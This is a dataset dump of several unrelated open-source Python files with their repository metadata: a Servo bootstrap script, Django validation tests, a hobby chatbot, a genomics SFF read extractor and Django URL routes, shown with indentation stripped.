'ccache', 'clang', 'autoconf2.13']
pkgs_dnf = ['libtool', 'gcc-c++', 'libXi-devel', 'freetype-devel',
'mesa-libGL-devel', 'mesa-libEGL-devel', 'glib2-devel', 'libX11-devel',
'libXrandr-devel', 'gperf', 'fontconfig-devel', 'cabextract', 'ttmkfdir',
'python2', 'python2-virtualenv', 'python2-pip', 'expat-devel', 'rpm-build',
'openssl-devel', 'cmake', 'bzip2-devel', 'libXcursor-devel', 'libXmu-devel',
'mesa-libOSMesa-devel', 'dbus-devel', 'ncurses-devel', 'harfbuzz-devel',
'ccache', 'mesa-libGLU-devel', 'clang', 'clang-libs', 'gstreamer1-devel',
'gstreamer1-plugins-base-devel', 'gstreamer1-plugins-bad-free-devel', 'autoconf213']
if context.distro == "Ubuntu":
if context.distro_version == "17.04":
pkgs_apt += ["libssl-dev"]
elif int(context.distro_version.split(".")[0]) < 17:
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
if context.distro_version == "14.04":
pkgs_apt += ["python-virtualenv"]
else:
pkgs_apt += ["virtualenv"]
pkgs_apt += ['libgstreamer1.0-dev', 'libgstreamer-plugins-base1.0-dev',
'libgstreamer-plugins-bad1.0-dev']
elif context.distro == "Debian" and context.distro_version == "Sid":
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
installed_something = install_linux_deps(context, pkgs_apt, pkgs_dnf, force)
if not check_gstreamer_lib():
installed_something |= gstreamer(context, force)
if context.distro == "Ubuntu" and context.distro_version == "14.04":
installed_something |= install_trusty_deps(force)
if not installed_something:
print("Dependencies were already installed!")
return 0
def salt(context, force=False):
# Ensure Salt dependencies are installed
install_salt_dependencies(context, force)
# Ensure Salt is installed in the virtualenv
# It's not instaled globally because it's a large, non-required dependency,
# and the installation fails on Windows
print("Checking Salt installation...", end='')
reqs_path = os.path.join(context.topdir, 'python', 'requirements-salt.txt')
process = subprocess.Popen(
["pip", "install", "-q", "-I", "-r", reqs_path],
stdout=PIPE,
stderr=PIPE
)
process.wait()
if process.returncode:
out, err = process.communicate()
print('failed to install Salt via pip:')
print('Output: {}\nError: {}'.format(out, err))
return 1
print("done")
salt_root = os.path.join(context.sharedir, 'salt')
config_dir = os.path.join(salt_root, 'etc', 'salt')
pillar_dir = os.path.join(config_dir, 'pillars')
# In order to allow `mach bootstrap` to work from any CWD,
# the `root_dir` must be an absolute path.
# We place it under `context.sharedir` because
# Salt caches data (e.g. gitfs files) in its `var` subdirectory.
# Hence, dynamically generate the config with an appropriate `root_dir`
# and serialize it as JSON (which is valid YAML).
config = {
'hash_type': 'sha384',
'master': 'localhost',
'root_dir': salt_root,
'state_output': 'changes',
'state_tabular': True,
}
if 'SERVO_SALTFS_ROOT' in os.environ:
config.update({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [os.path.abspath(os.environ['SERVO_SALTFS_ROOT'])],
},
})
else:
config.update({
'fileserver_backend': ['git'],
'gitfs_env_whitelist': 'base',
'gitfs_provider': 'gitpython',
'gitfs_remotes': [
'https://github.com/servo/saltfs.git',
],
})
if not os.path.exists(config_dir):
os.makedirs(config_dir, mode=0o700)
with open(os.path.join(config_dir, 'minion'), 'w') as config_file:
config_file.write(json.dumps(config) + '\n')
# Similarly, the pillar data is created dynamically
# and temporarily serialized to disk.
# This dynamism is not yet used, but will be in the future
# to enable Android bootstrapping by using
# context.sharedir as a location for Android packages.
pillar = {
'top.sls': {
'base': {
'*': ['bootstrap'],
},
},
'bootstrap.sls': {
'fully_managed': False,
},
}
if os.path.exists(pillar_dir):
shutil.rmtree(pillar_dir)
os.makedirs(pillar_dir, mode=0o700)
for filename in pillar:
with open(os.path.join(pillar_dir, filename), 'w') as pillar_file:
pillar_file.write(json.dumps(pillar[filename]) + '\n')
cmd = [
# sudo escapes from the venv, need to use full path
find_executable('salt-call'),
'--local',
'--config-dir={}'.format(config_dir),
'--pillar-root={}'.format(pillar_dir),
'state.apply',
'servo-build-dependencies',
]
if not force:
print('Running bootstrap in dry-run mode to show changes')
# Because `test=True` mode runs each state individually without
# considering how required/previous states affect the system,
# it will often report states with requisites as failing due
# to the requisites not actually being run,
# even though these are spurious and will succeed during
# the actual highstate.
# Hence `--retcode-passthrough` is not helpful in dry-run mode,
# so only detect failures of the actual salt-call binary itself.
retcode = run_as_root(cmd + ['test=True'])
if retcode != 0:
print('Something went wrong while bootstrapping')
return retcode
proceed = raw_input(
'Proposed changes are above, proceed with bootstrap? [y/N]: '
)
if proceed.lower() not in ['y', 'yes']:
return 0
print('')
print('Running Salt bootstrap')
retcode = run_as_root(cmd + ['--retcode-passthrough'])
if retcode == 0:
print('Salt bootstrapping complete')
else:
print('Salt bootstrapping encountered errors')
return retcode
def windows_msvc(context, force=False):
'''Bootstrapper for MSVC building on Windows.'''
deps_dir = os.path.join(context.sharedir, "msvc-dependencies")
deps_url = "https://servo-deps.s3.amazonaws.com/msvc-deps/"
def version(package):
return packages.WINDOWS_MSVC[package]
def package_dir(package):
return os.path.join(deps_dir, package, version(package))
def check_cmake(version):
cmake_path = find_executable("cmake")
if cmake_path:
cmake = subprocess.Popen([cmake_path, "--version"], stdout=PIPE)
cmake_version = cmake.stdout.read().splitlines()[0].replace("cmake version ", "")
if LooseVersion(cmake_version) >= LooseVersion(version):
return True
return False
to_install = {}
for package in packages.WINDOWS_MSVC:
# Don't install CMake if it already exists in PATH
if package == "cmake" and check_cmake(version("cmake")):
continue
if not os.path.isdir(package_dir(package)):
to_install[package] = version(package)
if not to_install:
return 0
print("Installing missing MSVC dependencies...")
for package in to_install:
full_spec = '{}-{}'.format(package, version(package))
parent_dir = os.path.dirname(package_dir(package))
if not os.path.isdir(parent_dir):
os.makedirs(parent_dir)
zip_path = package_dir(package) + ".zip"
if not os.path.isfile(zip_path):
zip_url = "{}{}.zip".format(deps_url, full_spec)
download_file(full_spec, zip_url, zip_path)
print("Extracting {}...".format(full_spec), end='')
extract(zip_path, deps_dir)
print("done")
extracted_path = os.path.join(deps_dir, full_spec)
os.rename(extracted_path, package_dir(package))
return 0
LINUX_SPECIFIC_BOOTSTRAPPERS = {
"salt": salt,
"gstreamer": bootstrap_gstreamer,
}
def bootstrap(context, force=False, specific=None):
'''Dispatches to the right bootstrapping function for the OS.'''
bootstrapper = None
if "windows-msvc" in host_triple():
bootstrapper = windows_msvc
elif "linux-gnu" in host_triple():
distro, version, _ = platform.linux_distribution()
if distro.lower() in [
'centos',
'centos linux',
'debian',
'fedora',
'ubuntu',
]:
context.distro = distro
context.distro_version = version
bootstrapper = LINUX_SPECIFIC_BOOTSTRAPPERS.get(specific, linux)
else:
raise Exception("mach bootstrap does not support %s, please file a bug" % distro)
if bootstrapper is None:
print('Bootstrap support is not yet available for your OS.')
return 1
return bootstrapper(context, force=force)
|
sadmansk/servo
|
python/servo/bootstrap.py
|
Python
|
mpl-2.0
| 13,376
| 0.00157
|
from django import forms
from django.test import TestCase
from django.core.exceptions import NON_FIELD_ERRORS
from modeltests.validation import ValidationTestCase
from modeltests.validation.models import Author, Article, ModelToValidate
# Import other tests for this package.
from modeltests.validation.validators import TestModelsWithValidators
from modeltests.validation.test_unique import (GetUniqueCheckTests,
PerformUniqueChecksTest)
from modeltests.validation.test_custom_messages import CustomMessagesTest
class BaseModelValidationTests(ValidationTestCase):
def test_missing_required_field_raises_error(self):
mtv = ModelToValidate(f_with_custom_validator=42)
self.assertFailsValidation(mtv.full_clean, ['name', 'number'])
def test_with_correct_value_model_validates(self):
mtv = ModelToValidate(number=10, name='Some Name')
self.assertEqual(None, mtv.full_clean())
def test_custom_validate_method(self):
mtv = ModelToValidate(number=11)
self.assertFailsValidation(mtv.full_clean, [NON_FIELD_ERRORS, 'name'])
def test_wrong_FK_value_raises_error(self):
mtv=ModelToValidate(number=10, name='Some Name', parent_id=3)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_correct_FK_value_validates(self):
parent = ModelToValidate.objects.create(number=10, name='Some Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertEqual(None, mtv.full_clean())
def test_limited_FK_raises_error(self):
# The limit_choices_to on the parent field says that a parent object's
# number attribute must be 10, so this should fail validation.
parent = ModelToValidate.objects.create(number=11, name='Other Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_wrong_email_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', email='not-an-email')
self.assertFailsValidation(mtv.full_clean, ['email'])
def test_correct_email_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', email='valid@email.com')
self.assertEqual(None, mtv.full_clean())
def test_wrong_url_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', url='not a url')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'Enter a valid value.'])
def test_correct_url_but_nonexisting_gives_404(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_url_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://www.djangoproject.com/')
self.assertEqual(None, mtv.full_clean()) # This will fail if there's no Internet connection
def test_correct_https_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='https://www.djangoproject.com/')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftp_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftp://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftps_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftps://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_text_greater_that_charfields_max_length_raises_erros(self):
mtv = ModelToValidate(number=10, name='Some Name'*100)
self.assertFailsValidation(mtv.full_clean, ['name',])
class ArticleForm(forms.ModelForm):
class Meta:
model = Article
exclude = ['author']
class ModelFormsTests(TestCase):
def setUp(self):
self.author = Author.objects.create(name='Joseph Kocherhans')
def test_partial_validation(self):
# Make sure the "commit=False and set field values later" idiom still
# works with model validation.
data = {
'title': 'The state of model validation',
'pub_date': '2010-1-10 14:49:00'
}
form = ArticleForm(data)
self.assertEqual(form.errors.keys(), [])
article = form.save(commit=False)
article.author = self.author
article.save()
def test_validation_with_empty_blank_field(self):
# Since a value for pub_date wasn't provided and the field is
# blank=True, model-validation should pass.
# Also, Article.clean() should be run, so pub_date will be filled after
# validation, so the form should save cleanly even though pub_date is
# not allowed to be null.
data = {
'title': 'The state of model validation',
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), [])
self.assertNotEqual(form.instance.pub_date, None)
article = form.save()
def test_validation_with_invalid_blank_field(self):
# Even though pub_date is set to blank=True, an invalid value was
# provided, so it should fail validation.
data = {
'title': 'The state of model validation',
'pub_date': 'never'
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), ['pub_date'])
|
bufferapp/buffer-django-nonrel
|
tests/modeltests/validation/tests.py
|
Python
|
bsd-3-clause
| 5,944
| 0.003197
|
import os
import sys as sys
os.system("python bot/bot.py engage")
import bot_response as bot
import bot_learn as learner
def hasUserSwore(message):
if "fuck" in message:
return True
elif "bitch" in message:
return True
elif "Fuck" in message:
return True
elif "Bitch" in message:
return True
else:
return False
#Allow the user to communicate with the bot
#Also allow the bot to learn about the person
def toBot():
if(os.path.isfile(".bot_engage")):
print "You can only run one instance of Clarissa."
else:
swearNum = 1
messageToBot = raw_input("Message: ")
if(messageToBot == "--add-command"):
writeCommand(command=raw_input("Command: "), response=raw_input("Responses: "))
reload(bot)
elif(messageToBot == "kill-bot"):
exit()
elif(messageToBot == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif(messageToBot == "learn"):
learner.learn(db_support=False)
elif(messageToBot == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
bot.getResponse(messageToBot)
toBot()
def writeCommand(command, response):
file = open("bot_response.py", "a")
file.write("\n\telif(messageToBot == \""+command+"\"):")
file.write("\n\t\tprint \"Clarissa: "+response+"\"")
file.flush()
file.close()
commandList = open("commands.list", "w")
commandList.write(command)
commandList.flush()
commandList.close()
def getIf(message, command, response):
if(message == command):
print "Clarissa: "+response
else:
print "I do not understand "+message
def getCommands():
return open("commands.bot", "r").read()
def getResponses():
return open("responses.bot", "r").read()
swearNum = 0
try:
if(sys.argv[1] == "--add-command"):
writeCommand(command=sys.argv[2], response=sys.argv[3])
reload(bot)
elif (sys.argv[1] == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif (sys.argv[1] == "learn"):
learner.learn(db_support=False)
elif (sys.argv[1] == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
else:
toBot()
except IndexError:
toBot()
|
indie-dev/Clarissa
|
bot.py
|
Python
|
apache-2.0
| 2,985
| 0.022446
|
__author__ = 'thuy'
|
cfe-lab/Umberjack
|
test/simulations/indelible/__init__.py
|
Python
|
bsd-2-clause
| 20
| 0
|
# Copyright 2012 Jose Blanca, Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of ngs_crumbs.
# ngs_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# ngs_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with ngs_crumbs. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
from array import array
from crumbs.utils.optional_modules import SffIterator
# pylint: disable=R0913
def _min_left_clipped_seqs(sff_fhand, trim, min_left_clip):
'It generates sequences (as tuples) given a path to a SFF file.'
for record in SffIterator(sff_fhand, trim=False):
annots = record.annotations
clip_qual = annots['clip_qual_left']
clip_adapt = annots['clip_adapter_left']
clip = max(min_left_clip, clip_qual, clip_adapt)
seq = record.seq
if trim:
record.annotations = {}
record = record[clip:]
else:
annots['clip_qual_left'] = clip
annots['clip_adapter_left'] = clip
seq = seq[:clip].lower() + seq[clip:].upper()
quals = record.letter_annotations['phred_quality']
record.letter_annotations = {}
record.seq = seq
dict.__setitem__(record._per_letter_annotations,
"phred_quality", quals)
yield record
class SffExtractor(object):
'This class extracts the reads from an SFF file'
def __init__(self, sff_fhands, trim=False, min_left_clip=0,
nucls_to_check=50, max_nucl_freq_threshold=0.5):
'It inits the class'
self.fhands = sff_fhands
self.trim = trim
self.min_left_clip = min_left_clip
# checking
self.nucls_to_check = nucls_to_check
self.max_nucl_freq_threshold = max_nucl_freq_threshold
self.nucl_counts = {}
@property
def seqs(self):
'It yields all sequences'
for fhand in self.fhands:
self._prepare_nucl_counts(fhand.name)
if not self.min_left_clip:
seqs = SffIterator(fhand, trim=self.trim)
else:
seqs = _min_left_clipped_seqs(fhand, self.trim,
self.min_left_clip)
for record in seqs:
self._update_nucl_counts(str(record.seq), fhand.name)
yield record
def _prepare_nucl_counts(self, fpath):
'It prepares the structure to store the nucleotide counts'
counts = {'A': array('L', [0] * self.nucls_to_check),
'T': array('L', [0] * self.nucls_to_check),
'C': array('L', [0] * self.nucls_to_check),
'G': array('L', [0] * self.nucls_to_check)}
self.nucl_counts[fpath] = counts
def _update_nucl_counts(self, seq, fpath):
'Given a seq (as a string) it updates the nucleotide counts'
seq = seq[:self.nucls_to_check]
counts = self.nucl_counts
for index, nucl in enumerate(seq):
try:
counts[fpath][nucl][index] += 1
except KeyError:
pass # we do not count the lowercase letters
@property
def clip_advice(self):
'It checks how many positions have a high max nucl freq.'
advices = {}
for fhand in self.fhands:
fpath = fhand.name
counts = self.nucl_counts[fpath]
treshold = self.max_nucl_freq_threshold
pos_above_threshold = 0
seq_above_threshold = ''
index = 0
for index in range(self.nucls_to_check):
num_nucls = [counts['A'][index], counts['T'][index],
counts['C'][index], counts['G'][index]]
tot_nucls = sum(num_nucls)
if not tot_nucls:
continue
freq_nucls = [i / tot_nucls for i in num_nucls]
above_threshold = [i >= treshold for i in freq_nucls]
if any(above_threshold):
pos_above_threshold += 1
seq_above_threshold += _get_nucl_with_max_freq('ATCG',
freq_nucls)
else:
break
if pos_above_threshold:
if self.trim:
# number of nucleotides to remove next time, the ones
# that we have detected plus the ones already removed
advice = index + self.min_left_clip, seq_above_threshold
else:
advice = index, seq_above_threshold
else:
advice = None
advices[fpath] = advice
return advices
def _do_seq_xml(seq):
seq = seq.object
annots = seq.annotations
read_len = len(seq)
read_name = seq.id
if 'E3MFGYR02FTGED' == read_name:
print annots, read_len
qual_left = annots.get('clip_qual_left', 0)
qual_right = annots.get('clip_qual_right', 0)
vector_left = annots.get('clip_adapter_left', 0)
vector_right = annots.get('clip_adapter_right', 0)
if vector_right >= read_len:
vector_right = 0
if qual_right >= read_len:
qual_right = 0
qual_left = 0 if qual_left < 0 else qual_left
qual_right = 0 if qual_right < 0 else qual_right
vector_left = 0 if vector_left < 0 else vector_left
vector_right = 0 if vector_right < 0 else vector_right
xml = '\t<trace>\n'
xml += '\t\t<trace_name>{}</trace_name>\n'.format(read_name)
if qual_left:
xml += '\t\t<clip_quality_left>{}</clip_quality_left>\n'.format(int(qual_left) + 1)
if qual_right:
xml += '\t\t<clip_quality_rigth>{}</clip_quality_rigth>\n'.format(qual_right)
if vector_left:
xml += '\t\t<clip_vector_left>{}</clip_vector_left>\n'.format(int(vector_left) + 1)
if vector_right:
xml += '\t\t<clip_vector_rigth>{}</clip_vector_rigth>\n'.format(vector_right)
xml += '\t</trace>\n'
return xml
def write_xml_traceinfo(seqs, fhand):
fhand.write('<?xml version="1.0"?>\n<trace_volume>\n')
for seq in seqs:
fhand.write(_do_seq_xml(seq))
yield seq
fhand.write('</trace_volume>\n')
fhand.flush()
def _get_nucl_with_max_freq(nucls, freq_nucls):
'It returns the nucleotide with the maximum frequency'
max_ = None
for index, freq in enumerate(freq_nucls):
if max_ is None or max_ < freq:
max_ = freq
nucl = nucls[index]
return nucl
|
JoseBlanca/ngs_crumbs
|
crumbs/seq/sff_extract.py
|
Python
|
gpl-3.0
| 7,004
| 0.000571
|
from django.conf.urls import url
from fundraiser_app import views
urlpatterns = [
url(r'^$', views.FMItemListView.as_view(), name='fmitem_list'),
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^fmitem/(?P<pk>\d+)$', views.FMItemDetailView.as_view(), name='fmitem_detail'),
url(r'^fmitem/new$', views.FMItemCreateView.as_view(), name='fmitem_new'),
url(r'^fmitem/(?P<pk>\d+)/edit$', views.FMItemUpdateView.as_view(), name='fmitem_edit'),
url(r'^fmitem/(?P<pk>\d+)/remove$', views.FMItemDeleteView.as_view(), name='fmitem_remove'),
url(r'^fmitem/(?P<pk>\d+)/publish/$', views.fmitem_publish, name='fmitem_publish'),
]
|
CarlGraff/fundraisermemorial
|
fundraiser_app/urls.py
|
Python
|
mit
| 663
| 0.006033
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.